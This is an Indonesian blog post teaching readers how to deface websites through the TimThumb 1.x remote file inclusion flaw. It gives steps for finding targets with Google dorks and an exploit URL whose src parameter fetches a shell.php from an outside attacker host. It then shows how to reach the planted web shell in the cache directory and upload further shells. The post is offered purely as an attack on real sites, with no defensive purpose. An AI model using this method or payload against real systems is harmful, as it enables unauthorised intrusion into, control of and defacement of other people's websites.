Tutorial Deface Dengan Metode Timthumb Exploit 1.xx

Konbanwa-minna, jadi gini ya malem" gak ada kerjaan mending gw buat artikel aja yakan hehe:3, kali ini gw mau buat tutorial Deface Dengan Metode Timthumb Exploit 1.xx, Oke siapkan dulu bahan"nya mas:

  1. Shell Backdoor:Senpai:*
  2. Dork:Mpshh:*
  3. Dah segitu:v
Oke pertama kalian lakukan dorking di google dorknya seperti biasa w udah sediain di atas:),kalian bisa kembangin lagi biar dapet yang fresh:),ciri" webnya vuln yaitu Timthumb versi 1.xx, lihat gambar berikut.
Nahh kemungkinan besar web tersebut bisa kita eksekusi:3,setelah kalian nemu target yang menurut kalian vuln, Kalian masukan exploitnya:
?src=http://picasa.com.2pproject.ca/shell.php
Contoh:https://site.co.li/path/timthumb.php?src=http://picasa.com.2pproject.ca/shell.php
Jikalau berhasil,lihat gambar berikut.
Kalian copy url uploadernya, Lalu kalian pastekan di blakang target kalian, dan bumm..
Setelah itu uploadlah shell kalian,cara akses shellnya?http://site.co.li/path/cache/namashell.php
Oke sekian tutorial dari gw semoga bermanfat..

Belum ada Komentar untuk "Tutorial Deface Dengan Metode Timthumb Exploit 1.xx"

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel